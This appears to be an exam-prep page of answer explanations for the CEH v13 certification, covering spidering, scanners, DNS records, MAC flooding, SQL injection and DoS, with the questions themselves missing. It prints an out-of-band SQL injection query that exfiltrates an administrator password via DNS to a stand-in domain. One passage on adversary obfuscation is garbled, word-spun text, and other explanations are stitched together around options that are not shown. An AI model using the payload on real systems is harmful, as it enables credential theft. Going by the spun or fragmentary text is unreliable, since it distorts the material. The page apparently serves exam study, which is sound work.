Pass the ECCouncil CEH v13 312-50v13 Questions and answers with CertsForce

User-directed spidering is a technique that allows the hacker to manually browse the target website and use a proxy or spider tool to capture and analyze the traffic. This way, the hacker can discover hidden or dynamic content that standard web spiders may miss due to a specific file in the root directory, such as robots.txt, that instructs them not to crawl certain pages or directories. User-directed spidering can also help the hacker to bypass authentication or authorization mechanisms, as well as identify vulnerabilities or sensitive information in the target website. User-directed spidering can be performed with tools like Burp Suite and WebScarab, which are web application security testing tools that can intercept, modify, and replay HTTP requests and responses, as well as perform various attacks and scans on the target website.

The other options are not likely to achieve the same results as user-directed spidering. Using Photon to retrieve archived URLs of the target website from archive.org may provide some historical information about the website, but it may not reflect the current state or content of the website. Using the Netcraft tool to gather website information may provide some general information about the website, such as its IP address, domain name, server software, or hosting provider, but it may not reveal the specific files or web pages on the website. Examining HTML source code and cookies may provide some clues about the website’s structure, functionality, or user preferences, but it may not expose the hidden or dynamic content that user-directed spidering can discover. References:

User Directed Spidering with Burp

Web Spidering - What Are Web Crawlers & How to Control Them

Web Security: Recon

Mapping the Application for Penetrating Web Applications — 1

Agent-based scanners reside on a single machine but can scan several machines on the same network.

Network-based scanner

A network-based vulnerability scanner, in simplistic terms, is the process of identifying loopholes on a computer’s network or IT assets, which hackers and threat actors can exploit. By implementing this process, one can successfully identify their organization’s current risk(s). This is not where the buck stops; one can also verify the effectiveness of your system's security measures while improving internal and external defenses. Through this review, an organization is well equipped to take an extensive inventory of all systems, including operating systems, installed software, security patches, hardware, firewalls, anti-virus software, and much more.

Agent-based scanner

Agent-based scanners make use of software scanners on each and every device; the results of the scans are reported back to the central server. Such scanners are well equipped to find and report out on a range of vulnerabilities.

NOTE: This option is not suitable for us, since for it to work, you need to install a special agent on each computer before you start collecting data from them.

The SOA (Start of Authority) record contains key DNS parameters, including TTL (Time To Live). The components of an SOA record are in this order:

(domain) IN SOA (Primary Name Server) (Responsible party) (Serial) (Refresh) (Retry) (Expire) (Minimum TTL)

Given:

Rutgers.edu. SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800 2400.)

Field breakdown:

Serial: 200302028

Refresh: 3600 seconds

Retry: 3600 seconds

Expire: 604800 seconds

Minimum TTL: 2400 seconds ← This is the TTL value

From CEH v13 Courseware:

Module 3: Scanning Networks

Topic: DNS Enumeration and Zone Transfers

Subsection: Understanding DNS Records

CEH v13 Study Guide states:

“In an SOA record, the last value is the Minimum TTL — the amount of time other DNS servers should cache resource records for the zone.”

Incorrect Options:

A: Serial number

B: Refresh interval

C: Expiry interval

E/F: Arbitrary, not part of the SOA shown

Adversaries could decide to build an possible or file difficult to find or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. this is often common behavior which will be used across totally different platforms and therefore the network to evade defenses.

Payloads may be compressed, archived, or encrypted so as to avoid detection. These payloads may be used throughout Initial Access or later to mitigate detection. typically a user’s action could also be needed to open and Deobfuscate/Decode Files or info for User Execution. The user can also be needed to input a parole to open a parole protected compressed/encrypted file that was provided by the mortal. Adversaries can also used compressed or archived scripts, like JavaScript.

Portions of files can even be encoded to cover the plain-text strings that will otherwise facilitate defenders with discovery. Payloads can also be split into separate, ostensibly benign files that solely reveal malicious practicality once reassembled.

Adversaries can also modify commands dead from payloads or directly via a Command and Scripting Interpreter. surroundings variables, aliases, characters, and different platform/language specific linguistics may be wont to evade signature based mostly detections and application management mechanisms.

Comprehensive and Detailed Explanation:

IDS cannot easily detect malicious content in encrypted traffic. Since the payload is encrypted (e.g., HTTPS, SSL/TLS), it is unreadable without decryption.

Statement B is therefore FALSE.

From CEH v13 Courseware:

Module 13: IDS, Firewalls and Honeypots → Limitations of IDS

Comprehensive and Detailed Explanation:

In a MAC flooding attack, tools like macof (shown in the image) rapidly generate a large number of Ethernet frames with spoofed source MAC addresses. These are sent to the switch to overflow its CAM (Content Addressable Memory) table.

Once the CAM table is full:

The switch can no longer learn new MAC-to-port associations.

It fails open and starts broadcasting all incoming traffic to all ports.

This causes the switch to act like a hub.

Consequently, the attacker can:

Sniff traffic that would otherwise be switched.

Intercept data not destined for their system.

From CEH v13 Courseware:

Module 8: Sniffing → Switch-Based Attacks → MAC Flooding

Incorrect Options:

B: A switch typically does not crash but reverts to hub behavior.

C: There is no factory default override behavior like this.

D: Packets are not dropped—this would defeat the attack’s purpose.

https://en.wikipedia.org/wiki/Private_network

In IP networking, a private network is a computer network that uses private IP address space. Both the IPv4 and the IPv6 specifications define private IP address ranges. These addresses are commonly used for local area networks (LANs) in residential, office, and enterprise environments.

Private network addresses are not allocated to any specific organization. Anyone may use these addresses without approval from regional or local Internet registries. Private IP address spaces were originally defined to assist in delaying IPv4 address exhaustion. IP packets originating from or addressed to a private IP address cannot be routed through the public Internet.

The Internet Engineering Task Force (IETF) has directed the Internet Assigned Numbers Authority (IANA) to reserve the following IPv4 address ranges for private networks:

· 10.0.0.0 – 10.255.255.255

· 172.16.0.0 – 172.31.255.255

· 192.168.0.0 – 192.168.255.255

Backbone routers do not allow packets from or to internal IP addresses. That is, intranet machines, if no measures are taken, are isolated from the Internet. However, several technologies allow such machines to connect to the Internet.

· Mediation servers like IRC, Usenet, SMTP and Proxy server

· Network address translation (NAT)

· Tunneling protocol

NOTE: So, the problem is just one of these technologies.

TCP Maimon scan

This scan technique is very similar to NULL, FIN, and Xmas scan, but the probe used here is

FIN/ACK. In most cases, to determine if the port is open or closed, the RST packet should be generated as a response to a probe request. However, in many BSD systems, the port is open if the packet gets dropped in response to a probe.

https://nmap.org/book/scan-methods-maimon-scan.html

How Nmap interprets responses to a Maimon scan probe

Probe Response Assigned State

No response received (even after retransmissions) open|filtered

TCP RST packet closed

ICMP unreachable error (type 3, code 1, 2, 3, 9, 10, or 13) filtered

Comprehensive and Detailed Explanation:

In TCP session hijacking or spoofing:

An attacker sends a spoofed packet with the ACK bit set and a guessed (or predicted) sequence number to fool the receiver into thinking it's a legitimate continuation of an existing session.

Fred is simulating this by sending a TCP packet with the ACK bit and using his own IP as the source, trying to trick the switch into believing it's part of an already established session.

From CEH v13 Courseware:

Module 11: Session Hijacking

An ‘out-of-band’ SQL Injection attack is a type of SQL injection where the attacker does not receive a response from the attacked application on the same communication channel but instead is able to cause the application to send data to a remote endpoint that they control1. This technique can be used to bypass input validation and pattern matching measures that are based on the application’s responses. The attacker can use various SQL functions or commands that trigger DNS or HTTP requests, such as load_file, copy, dbms_ldap, etc., depending on the SQL server type123. By concatenating the data they want to extract with a domain name they own, the attacker can receive the data via DNS or HTTP logs. For example, the attacker can inject the following SQL query to exfiltrate the password of the administrator user from a MySQL database:

SELECT load_file(CONCAT('\\\\',(SELECT password FROM users WHERE username='administrator'),'.example.com\\\\test.txt'))

This will cause the application to send a DNS request to the domain password.example.com, where password is the actual value of the administrator’s password1.

Vulnerability scanning software is a tool that can help security analysts identify and prioritize known vulnerabilities in their systems and applications. However, it is not a perfect solution and has some limitations that need to be considered. One of the most critical limitations is that vulnerability scanning software is not immune to software engineering flaws that might lead to serious vulnerabilities being missed. This means that the software itself might have bugs, errors, or oversights that could affect its accuracy, reliability, or performance. For example, the software might:

Fail to detect some vulnerabilities due to incomplete or outdated databases, incorrect signatures, or insufficient coverage of the target system or application.

Produce false positives or false negatives due to misinterpretation of the scan results, incorrect configuration, or lack of context or validation.

Cause unintended consequences or damage to the target system or application due to intrusive or aggressive scanning techniques, such as exploiting vulnerabilities, modifying data, or crashing services.

Be vulnerable to attacks or compromise by malicious actors who could exploit its weaknesses, tamper with its functionality, or steal its data.

Therefore, the security analyst should be most cautious about this limitation of vulnerability scanning software, as it could lead to a false sense of security, missed opportunities for remediation, or increased exposure to threats. The security analyst should always verify the scan results, use multiple tools and methods, and update and patch the software regularly to mitigate this risk.

https://en.wikipedia.org/wiki/Web_application_firewall

A web application firewall (WAF) is a specific form of application firewall that filters, monitors, and blocks HTTP traffic to and from a web service. By inspecting HTTP traffic, it can prevent attacks exploiting a web application's known vulnerabilities, such as SQL injection, cross-site scripting (XSS), file inclusion, and improper system configuration.

PKI uses public-key cryptography, which is widely used on the Internet to encrypt messages or

authenticate message senders. In public-key cryptography, a CA generates public and private

keys with the same algorithm simultaneously. The private key is held only by the subject (user,

company, or system) mentioned in the certificate, while the public key is made publicly available

in a directory that all parties can access. The subject keeps the private key secret and uses it to

decrypt the text encrypted by someone else using the corresponding public key (available in a

public directory). Thus, others encrypt messages for the user with the user's public key, and the user decrypts it with his/her private key.

Comprehensive and Detailed Explanation:

A TCP SYN flood is a type of Denial of Service (DoS) attack. The attacker sends a barrage of SYN packets with spoofed (random or unreachable) source IP addresses. The victim server replies with SYN/ACK, but the final ACK never arrives.

This results in:

The victim keeping the half-open connections in the queue.

The queue filling up, leading to new, legitimate requests being dropped.

From CEH v13 Courseware:

Module 9: Denial-of-Service Attacks → TCP SYN Flood